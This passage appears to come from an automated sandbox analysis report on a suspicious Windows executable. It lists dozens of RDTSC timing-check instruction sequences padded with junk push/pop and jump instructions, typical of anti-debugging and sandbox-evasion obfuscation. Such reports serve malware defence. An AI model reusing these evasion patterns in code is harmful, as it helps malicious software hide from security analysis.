                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F92AF second address: 4F92B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F92B3 second address: 4F92C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4EF0C79888h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5006CB second address: 5006D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5006D3 second address: 5006E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F4EF0C79886h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500807 second address: 50083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4EF0C09E1Ch 0x0000000b pushad 0x0000000c jmp 00007F4EF0C09E1Bh 0x00000011 jmp 00007F4EF0C09E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C60 second address: 500C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C64 second address: 500C83 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4EF0C09E1Ch 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C83 second address: 500C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C89 second address: 500C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C8D second address: 500C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500E18 second address: 500E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500E1D second address: 500E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4EF0C79895h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50564A second address: 505650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505650 second address: 505659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A19 second address: 505A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A29 second address: 505A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79899h 0x00000007 jmp 00007F4EF0C7988Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F4EF0C79886h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A61 second address: 505A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 505A65 second address: 505A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9EF2 second address: 4A9EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9EF6 second address: 4A9F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4EF0C7988Ah 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 push esi 0x00000016 js 00007F4EF0C79886h 0x0000001c pop esi 0x0000001d popad 0x0000001e nop 0x0000001f call 00007F4EF0C7988Eh 0x00000024 mov ecx, dword ptr [ebp+122D3B47h] 0x0000002a pop ecx 0x0000002b mov ebx, dword ptr [ebp+12484F98h] 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F4EF0C79888h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b stc 0x0000004c add eax, ebx 0x0000004e jmp 00007F4EF0C7988Dh 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnc 00007F4EF0C7988Ch 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9F7C second address: 4A9FBF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F4EF0C09E18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 and dx, 2867h 0x0000002a push 00000004h 0x0000002c jmp 00007F4EF0C09E1Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9FBF second address: 4A9FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 506016 second address: 50601A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50601A second address: 506054 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F4EF0C79886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F4EF0C79893h 0x00000015 jng 00007F4EF0C79886h 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jmp 00007F4EF0C7988Ch 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 506054 second address: 506066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4EF0C09E16h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 506066 second address: 506070 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4EF0C79886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DA8C second address: 50DA97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DA97 second address: 50DA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DA9B second address: 50DAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DAA1 second address: 50DAA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50DAA6 second address: 50DAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4EF0C09E29h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50E33D second address: 50E347 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4EF0C79886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50E347 second address: 50E370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4EF0C09E26h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F4EF0C09E16h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50EC02 second address: 50EC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50EC06 second address: 50EC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 50F466 second address: 50F488 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4EF0C798A4h 0x00000008 jmp 00007F4EF0C79898h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5138AB second address: 5138BA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4EF0C09E16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5138BA second address: 5138BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5129B0 second address: 5129B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512C9C second address: 512CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CA2 second address: 512CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CA6 second address: 512CAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CAA second address: 512CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4EF0C09E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F4EF0C09E25h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 512CCF second address: 512CDE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5130F4 second address: 513112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F4EF0C09E22h 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 513112 second address: 513127 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79888h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007F4EF0C79886h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 513412 second address: 51341D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51341D second address: 513421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 513584 second address: 513588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51826D second address: 518280 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4EF0C79888h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 518280 second address: 518285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 460244 second address: 460248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 460248 second address: 46024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520A36 second address: 520A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4EF0C79886h 0x00000009 jmp 00007F4EF0C7988Eh 0x0000000e popad 0x0000000f jmp 00007F4EF0C79891h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c jbe 00007F4EF0C7988Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520A6F second address: 520A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520A73 second address: 520A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C79892h 0x00000008 jmp 00007F4EF0C7988Fh 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51EE41 second address: 51EE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51EE45 second address: 51EE4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51EE4B second address: 51EE60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C09E20h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51F2BC second address: 51F2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51F2C6 second address: 51F2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4EF0C09E22h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51F2E0 second address: 51F2E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 51FA95 second address: 51FA9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5201CB second address: 5201E1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4EF0C79888h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F4EF0C798D5h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5201E1 second address: 5201FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E28h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5201FD second address: 520201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 520201 second address: 52020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 52020D second address: 520213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 522E87 second address: 522E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 52862B second address: 528639 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 528639 second address: 52863D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 52863D second address: 528643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46A36C second address: 46A38E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007F4EF0C09E27h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 45E64C second address: 45E651 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 45E651 second address: 45E657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 45E657 second address: 45E67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F4EF0C79886h 0x00000010 jnc 00007F4EF0C79886h 0x00000016 jnp 00007F4EF0C79886h 0x0000001c jp 00007F4EF0C79886h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53939E second address: 5393AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4EF0C09E16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53FF37 second address: 53FF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007F4EF0C7988Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53FF4C second address: 53FF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F4EF0C09E16h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 53FF59 second address: 53FF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548850 second address: 548856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548856 second address: 548861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548861 second address: 548865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548865 second address: 548869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548869 second address: 548879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4EF0C09E16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5486E6 second address: 5486FF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4EF0C79892h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5486FF second address: 548705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548705 second address: 548718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4EF0C7989Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 548718 second address: 548724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 54FF4F second address: 54FF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4EF0C79896h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c ja 00007F4EF0C798A3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 54FF76 second address: 54FF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Fh 0x00000009 rdtsc
